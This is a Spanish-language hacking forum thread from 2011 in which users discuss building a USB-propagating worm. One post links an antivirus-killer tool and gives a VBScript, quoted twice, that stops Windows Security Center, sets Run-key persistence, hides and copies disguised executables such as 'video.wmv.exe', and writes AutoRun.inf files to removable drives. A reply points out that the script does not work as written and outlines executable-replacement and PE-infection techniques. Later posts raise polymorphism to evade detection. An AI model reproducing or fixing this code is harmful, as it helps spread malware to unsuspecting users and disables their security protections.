Mi nuevo propagador, por usb!!

Garfield07 · 9 Enero 2011, 15:03 PM

Sep, lo ultimo seria bueno... Podrias poner algo del code? (Si quieres, claro, es para verlo nada mas xD) Eso yo lo haria en C, en ASM seria mas dificil para mi...

sabeeee · 22 Enero 2011, 17:06 PM

Acá tenes este killer http://troyanosyvirus.com.ar/2008/02/av-firewall-killer.html que me mato al nod32v4 2011 pero ojo, es detectado yo una vez logre que sea detectado solo por 11 antivirus con pero...lo borre porque se que se pueden hacer virus sin destruir a un antivirus, eso ya es maldad.

pero proba con esto:

Citarset cmd = createobject("wscript.shell" )
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide

y convertirlo con el ExeScript.

Saludos y espero que te sirva...

Garfield07 · 22 Enero 2011, 17:30 PM

Citar
sagrini, yo no digo que se haga en batch, he dicho que lo he hecho en Pascal.
Sobre lo que se comenta de batch nose, pero si suplantan un exe por un batch el icono canta que no veas...

fff menos mal es que como estamos hablando con Batch... Ya decia yo...
Yo lo haria en C de todos modos Pascal no me resulta muy conocido

Sobre el nuevo code... lo has escrito tu? Yo lo haria con APIs de C, que son algo mas extensas... Pero creo que tu code no funciona $:-\$ No estamos buscando eso exactamente

Lord RNA podrias enseñarme el code? Es por verlo, si quieres...
@skapunky ahora en un ratillo podria hacer el primer programa en C, y listo...

Space.Medafighter.X · 22 Enero 2011, 21:50 PM

Cita de: boludoz en 22 Enero 2011, 17:06 PM
set cmd = createobject("wscript.shell" )
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide

Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.

Tampoco el código es una obra maestra...

Citarcmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide

Eso fue muy sin sentido...

Citarcmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide

En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".

Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.

CitarLord RNA podrias enseñarme el code? Es por verlo, si quieres...

Ciertamente no es complicado,

CitarYo hice uno en ASM que suplantaba un ejecutable y guardaba el real en otra parte del disco, cuando dabas doble clic se ejecutaba el worm y lanzaba el programa real

Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.

Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.

sabeeee · 25 Enero 2011, 20:11 PM

Cita de: Space.Medafighter.X en 22 Enero 2011, 21:50 PM
Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.

Tampoco el código es una obra maestra...

Eso fue muy sin sentido...

En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".

Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.

Ciertamente no es complicado,

Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.

Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.

PERDÓN ES QUE SOY MUY NUEVO EN ESTOY Y GRACIAS POR TU LECCIÓN.

sabeeee · 25 Enero 2011, 20:14 PM

Igual la idea básica sirve de todos modos es la mejor que por lo menos yo conozco de ocultar por completo un código en linea de comando sin ser detectado por el av.

.:Snifer:. · 25 Enero 2011, 22:15 PM

Hey men no hagas doble post..!!! solo edita el anterior nada mas que eso hay la opcion de editar, modificar mensaje

Aver si entendi. un poco lo que indica Lord y aparte sakapunky creo si se hace por suplantacion es mejor.

Pero si se llega a realizar un Worm que sea capaz de modificarse a si mismo entre los S.0 es decir XP,VISTA y 7 no llegaria a ser mas factible. Un poco de polimorfismo si no estoy mal ..
Espero que alguien me corrija si ando mal.

NESTicle 8Bit · 7 Febrero 2011, 18:03 PM

Cita de: 4ng3r en 5 Enero 2011, 19:02 PM
Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!!

jlpm · 10 Febrero 2011, 22:42 PM

funciona en windows7??
saludos

locot3 · 16 Febrero 2011, 19:25 PM

Muchas criticas para ser un proyecto !! ajahaha esta bueno yo te felicito ! pero con el tiempo estoy seguro q podras mejorarlo mucho